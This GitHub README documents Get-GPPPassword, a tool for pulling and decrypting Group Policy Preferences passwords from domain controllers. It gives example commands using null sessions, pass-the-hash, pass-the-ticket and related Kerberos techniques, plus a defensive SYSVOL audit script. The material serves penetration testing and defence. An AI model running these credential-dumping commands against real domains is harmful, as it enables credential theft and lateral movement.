ShutdownRepo / Get-GPPPassword

Python script for extracting and decrypting Group Policy Preferences passwords

Home Page: https://www.thehacker.recipes/active-directory-domain-services/movement/credentials/dumping/group-policies-preferences

⚠️ THIS REPO IS DISCONTINUED SINCE IT HAS BEEN OFFICIALLY ADDED TO IMPACKET. IT WILL ONLY BE MAINTAINED THERE ⚠️

Get-GPPPassword

Python script for extracting and decrypting Group Policy Preferences passwords. It uses Impacket's library and reads files as streams over SMB to carve them, instead of mounting shares.

Install

This script can be run standalone (python3 -m pip install -r requirements.txt) or added to Impacket (cd /path/to/impacket; cp Get-GPPPassword.py examples/; python3 -m pip install .).

Examples

NULL session

python3 Get-GPPPassword.py -no-pass domain_controller

Username, password

python3 Get-GPPPassword.py domain.local/someuser:somepassword@domain_controller

Pass-the-hash

python3 Get-GPPPassword.py -hashes [LMhash]:NThash domain.local/someuser@domain_controller

Pass-the-ticket

export KRB5CCNAME=someuser.ccache
python3 Get-GPPPassword.py -k domain_controller

Pass-the-key

python3 Get-GPPPassword.py -aesKey aesKey domain.local/someuser@domain_controller

Overpass-the-hash

python3 Get-GPPPassword.py -k -hashes [LMhash]:NThash domain.local/someuser@domain_controller

Usage

usage: Get-GPPPassword.py [-h] [-share SHARE] [-base-dir BASE_DIR] [-ts]
                          [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                          [-aesKey hex key] [-dc-ip ip address]
                          [-target-ip ip address] [-port [destination port]]
                          target

Group Policy Preferences passwords finder and decryptor

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          SMB Share
  -base-dir BASE_DIR    Directory to search in (Default: /)
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it
                        will use the domain part (FQDN) specified in the
                        target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it
  -port [destination port]
                        Destination port to connect to SMB Server
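
For administrators who want to check their own environment for the entries this tool looks for, the following added example (not part of the original script or of Impacket) audits a local copy of SYSVOL for preference files that still carry a non-empty cpassword attribute, and reports where they are without decrypting or printing the value. The sample XML, the function names and the list of account attribute names are assumptions made for the illustration.

```python
import os
import xml.etree.ElementTree as ET

# Constructed sample of a Groups.xml preference file. The cpassword value is a
# placeholder string, not real ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2013-01-15 10:22:31">
    <Properties action="U" cpassword="PLACEHOLDER" userName="LocalAdmin"/>
  </User>
  <User name="Guest" changed="2019-06-02 08:00:00">
    <Properties action="U" cpassword="" userName="Guest"/>
  </User>
</Groups>
"""

# Attributes that name the account in different preference files (assumption:
# userName, accountName and runAs cover the common cases).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per element with a non-empty cpassword attribute."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []  # not well-formed XML, nothing to report
    # Map child -> parent: the 'changed' timestamp sits on the parent element.
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if not elem.get("cpassword"):
            continue  # attribute absent or empty
        parent = parents.get(elem, elem)
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({"file": source, "element": parent.tag,
                         "account": account, "changed": parent.get("changed", "")})
    return findings

def audit_tree(base_dir):
    """Scan every .xml file under a local SYSVOL copy; the value is never printed."""
    findings = []
    for dirpath, _dirs, files in os.walk(base_dir):
        for name in (f for f in files if f.lower().endswith(".xml")):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings += find_cpasswords(fh.read(), path)
    return findings

if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML):
        print(finding)
```

Any finding means the credential should be treated as exposed to every account that can read SYSVOL: remove the preference item and rotate the password.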

Credits

Thanks to :

License: GNU General Public License v3.0

